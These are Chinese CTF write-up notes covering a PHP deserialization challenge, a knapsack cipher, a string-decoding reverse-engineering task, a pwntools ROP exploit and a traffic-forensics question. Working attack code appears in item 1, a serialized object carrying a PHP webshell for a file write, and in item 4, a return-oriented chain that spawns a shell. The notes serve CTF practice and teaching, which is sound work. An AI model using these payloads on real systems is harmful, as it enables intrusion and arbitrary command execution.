1
绕过 __wakeup、__sleep(PHP 反序列化相关的魔术方法)
$u,$p
code=$u.$p
<?php
/**
 * Plain data holder used to produce a serialized `ctfshowvip` object.
 *
 * Only the class name and the three public property values end up in the
 * serialized string; methods are supplied by whichever class definition the
 * deserializing application has loaded. That is why unserialize() on
 * request-controlled data hands the sender control over these fields.
 * Prefer json_decode(), or unserialize($data, ['allowed_classes' => false]),
 * for data that crosses a trust boundary.
 *
 * The notes preceding this listing mention `code=$u.$p`; this constructor
 * never assigns $code, so it serializes as null. How the receiving class
 * uses the fields is not shown here.
 */
class ctfshowvip
{
    // Kept untyped: a typed property without a default would be uninitialized
    // and dropped from serialize() output, changing the property count.
    public $username;
    public $password;
    public $code;

    /**
     * @param mixed $u value stored in $username
     * @param mixed $p value stored in $password
     */
    public function __construct($u, $p)
    {
        [$this->username, $this->password] = [$u, $p];
    }
}
// Build the object with the two values from the challenge notes and print its
// serialized form (O:<len>:"<class>":<count>:{...}).
// Detection angle: a request parameter holding a serialized PHP object whose
// string fields contain a `.php` file name and a `<?php` tag is a strong
// indicator of an object-injection attempt aimed at a file write.
$vip = new ctfshowvip('877.php', "<?php system('tac /f*');?>");
$serialized = serialize($vip);
echo $serialized;
2
私钥由公钥产生
from Crypto.Util.number import *
import random
# NOTE(review): the original listing was collapsed onto a few long lines; the
# block structure below is reconstructed from syntax — confirm against the
# original challenge script.
from secret import flag


def GET_KEY(n):
    """Return a list of n + 1 integers, each larger than the sum of all before it.

    The list starts at [1]; the running total starts at 2 and grows by every
    appended element, so it always equals sum(list) + 1. Each new element is
    that total plus a non-negative random offset, which makes the sequence
    strictly super-increasing.

    Note: `random` is not a cryptographically secure generator.
    """
    running_total = 2
    sequence = [1]
    for _ in range(n):
        # Both draws are made on every round, in this order.
        gate = random.randint(0, 1)
        element = running_total + random.randint(0, n) * gate
        sequence.append(element)
        running_total += element
    return sequence


def enc(m, k):
    """Return the sum of k[i] over every position i where m[i] == 1 (subset sum)."""
    return sum(bit * k[idx] for idx, bit in enumerate(m) if bit == 1)


# This integer form is overwritten on the next statement and never used.
m = bytes_to_long(flag)
# One list entry per bit of the flag, most significant bit of each byte first.
m = [int(ch) for ch in ''.join(format(byte, '08b') for byte in flag)]
key = GET_KEY(len(m))
c = enc(m, key)

# Weakness: the super-increasing sequence is written out in full next to the
# ciphertext, with no modular disguise applied to it. A subset sum over a
# known super-increasing sequence has a unique solution that the standard
# largest-first decode recovers, so output.txt offers no confidentiality.
# The two values are written back to back with no separator.
with open('output.txt', 'w') as f:
    f.write(str(c) + str(key))
3
攻防世界666
封装函数,双击追踪flag
从 strcmp 处追踪到 flag 经 encode 之后的字符串
# Encoded string that the binary compares against (18 characters).
a2 = "izwhroz\"\"w\"v.K\".Ni"
key = 18
v3 = ""
flag = ""

# Each step maps one character to one character, so the length is unchanged.
# The string is handled in groups of three: after XOR with the key, position 1
# of a group has 6 subtracted, position 2 has 6 added, position 3 is XORed
# with 6.
undo_steps = (
    lambda value: value - 6,
    lambda value: value + 6,
    lambda value: value ^ 6,
)
for start in range(0, 18, 3):
    for offset, undo in enumerate(undo_steps):
        v3 = a2[start + offset]
        flag += chr(undo(ord(v3) ^ key))
4
from pwn import *
# NOTE(review): the original listing was collapsed onto a few long lines; the
# statement order below follows the original exactly.
context.arch = "amd64"  # must be set before asm() assembles the gadgets
io = process("./rop")
elf = ELF("./rop")

# Everything is looked up in the ELF file itself: the `system` symbol, the
# bytes "sh\0", and two instruction sequences.
system_addr = elf.sym["system"]
sh_addr = next(elf.search(b"sh\x00"))
pop_rdi_ret = next(elf.search(asm("pop rdi; ret")))
# Address of a bare `ret`; presumably placed first to keep the stack 16-byte
# aligned when `system` is entered — confirm against the target.
ret_addr = next(elf.search(asm("ret")))

# Hardening note: these fixed file addresses and the fixed 0x20 + 0x8 filler
# only line up when the binary is loaded at its link-time base and nothing
# guards the saved return address. PIE with ASLR or a stack canary would
# invalidate them — check the build flags of the target (e.g. with checksec).
filler = b"b" * (0x20 + 0x8)
chain = (ret_addr, pop_rdi_ret, sh_addr, system_addr)
payload = filler + b"".join(p64(word) for word in chain)

io.sendline(payload)
io.interactive()
5
“找出攻击者的IP”
在 HTTP 协议的流量中,
可疑点:存在针对 hacker.php 的 POST 请求;追踪 hacker.php 相关的数据流,对内容做 URL 解码后,确认这是开了一个后门,因此发起这些请求的源 IP 就是要找的攻击者 IP。